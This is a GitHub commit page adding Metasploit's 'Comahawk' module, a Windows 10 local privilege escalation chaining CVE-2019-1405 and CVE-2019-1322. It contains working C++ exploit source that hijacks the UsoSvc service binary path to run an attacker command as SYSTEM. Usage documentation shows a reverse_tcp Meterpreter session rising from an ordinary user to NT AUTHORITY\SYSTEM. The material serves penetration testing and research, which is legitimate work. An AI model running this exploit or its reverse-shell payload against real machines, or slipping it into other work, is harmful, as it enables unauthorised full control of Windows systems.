Skip to content

Commit

Permalink
Land rapid7#12693, add Comahawk privilege escalation
Browse files Browse the repository at this point in the history
  • Loading branch information
@space-r7
space-r7 committed Dec 18, 2019
2 parents 4a5b8c6 + b36c191 commit 894927d
Show file tree
Hide file tree
Showing 8 changed files with 604 additions and 0 deletions.
Binary file added data/exploits/cve-2019-1322/CVE-2019-1322-EXE.exe
View file
Binary file not shown.
110 changes: 110 additions & 0 deletions documentation/modules/exploit/windows/local/comahawk.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,110 @@
## Introduction

This leverages two vulnerabilities on specific builds of Windows 10 to
move from an authenticated user of any level to NT AUTHORITY\LOCAL SERVICE
and then from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
NT AUTHORITY\LOCAL SERVICE
The second (CVE-2019-1322) leverages the Update Orchestrator Service to
elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.

The exploit works by creating a new service, so the exploit may take
up to minute on test systems, and may take longer in the wild. Adjusting
the exploit_timeout value in the datastore.

## Usage

1. Create a session on the target system under the context of an authenticated user.
2. Begin interacting with the module: `use exploit/windows/local/comahawk`.
3. Set the `PAYLOAD` and configure it correctly.
4. If an existing handler is configured to receive the elevated session, then the module's
handler should be disabled: `set DisablePayloadHandler true`.
5. Make sure that the `SESSION` value is set to the existing session identifier.
6. Invoke the module: `run`.

## Scenario

### Windows 10 (10.0 Build 17134) x64

```
[*] Meterpreter session 1 opened (192.168.135.168:5555 -> 192.168.132.125:49674) at 2019-12-11 18:33:09 -0600
meterpreter > sysinfo
Computer : DESKTOP-D1E425Q
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/comahawk
msf5 exploit(windows/local/comahawk) > set versbose true
versbose => true
msf5 exploit(windows/local/comahawk) > set session 1
session => 1
msf5 exploit(windows/local/comahawk) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/comahawk) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(windows/local/comahawk) > show options
Module options (exploit/windows/local/comahawk):
Name Current Setting Required Description
---- --------------- -------- -----------
EXECUTE_DELAY 3 yes The number of seconds to delay between file upload and exploit launch
EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default).
EXPLOIT_TIMEOUT 60 yes The number of seconds to wait for exploit to finish running
PAYLOAD_NAME no The filename for the payload to be used on the target host (%RAND%.exe by default).
SESSION 1 yes The session to run this module on.
WRITABLE_DIR no Path to write binaries (%TEMP% by default).
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
msf5 exploit(windows/local/comahawk) > run
[*] Started reverse TCP handler on 192.168.135.168:4444
[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1
[*] Exploit uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\TcpHnwmv.exe
[*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\EubQLoJJbPMX.exe
[*] It may take a moment after the session is established for the exploit to exit safely.
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-12-11 18:35:35 -0600
meterpreter > sysinfo
Computer : DESKTOP-D1E425Q
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
22 changes: 22 additions & 0 deletions external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.sln
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-1322-EXE", "CVE-2019-1322-EXE.vcxproj", "{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.ActiveCfg = Debug|x64
{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.Build.0 = Debug|x64
{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.ActiveCfg = Release|x64
{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
150 changes: 150 additions & 0 deletions external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,150 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CVE20191322EXE</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>..\..\..\..\..\data\exploits\cve-2019-1322</OutDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="cve-2019-1322.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
22 changes: 22 additions & 0 deletions external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj.filters
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="cve-2019-1322.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
</Project>
67 changes: 67 additions & 0 deletions external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,67 @@
#include <atlbase.h> // CComPtr
#include <Propvarutil.h>
#include <string>
#import "wshom.ocx" no_namespace, raw_interfaces_only // Error here is a bug. It will still compile

# define command_size 128

int wmain(int argc, wchar_t* argv[], wchar_t* envp[])
{
GUID guidObject = { 0x6d8ff8e7, 0x730d, 0x11d4, { 0xbf, 0x42, 0x00, 0xb0, 0xd0, 0x11, 0x8b, 0x56 } };
struct __declspec(uuid("6d8ff8d4-730d-11d4-bf42-00b0d0118b56"))
IUPnPContainerManager : public IUnknown {
virtual HRESULT __stdcall ReferenceContainer(wchar_t*) = 0;
virtual HRESULT __stdcall UnReferenceContainer(wchar_t*) = 0;
virtual HRESULT __stdcall CreateInstance(
wchar_t* string1,
GUID* guid1,
GUID* guid2,
IUnknown** pObject) = 0;
virtual HRESULT __stdcall CreateInstanceWithProgID(
wchar_t* string1,
wchar_t* guid1,
GUID* guid2,
IUnknown** pObject) = 0;
virtual HRESULT __stdcall Shutdown() = 0;

};
wchar_t command[command_size];

CoInitialize(NULL);
HRESULT hr1, hr2 = 0, hr3 = 0, hr4 = 0;
IUPnPContainerManager* ContainerMgr;
hr1 = CoCreateInstance(guidObject, nullptr, CLSCTX_ALL, IID_PPV_ARGS(&ContainerMgr));
hr2 = ContainerMgr->ReferenceContainer((wchar_t*)L"fUUUtb");
CLSID clsid;
CLSIDFromProgID(OLESTR("WScript.Shell"), &clsid);
IWshShell* WshInterface = nullptr;
auto ShellUUID = __uuidof(IWshShell);
hr3 = ContainerMgr->CreateInstance((wchar_t*)L"fUUUtb", &clsid, &ShellUUID, (IUnknown**)&WshInterface);

int out;
VARIANT s;
InitVariantFromInt32(1, &s);
VARIANT type;
InitVariantFromBoolean(TRUE, &type);

if (argc == 2)
{
const wchar_t* msg[6] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c ", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
memset((void*) command, 0, command_size * sizeof(wchar_t));
wsprintf(command, L"%s%s &\"", msg[1], argv[1]);
for (int i = 0; i < 6; i++)
{
if (i == 1)
{
hr4 = WshInterface->Run(::SysAllocString(command), &s, &type, &out);
}
else
{
hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
}
Sleep(3000);
}
}
CoUninitialize();
return 0;
}
Loading

0 comments on commit 894927d

Please sign in to comment.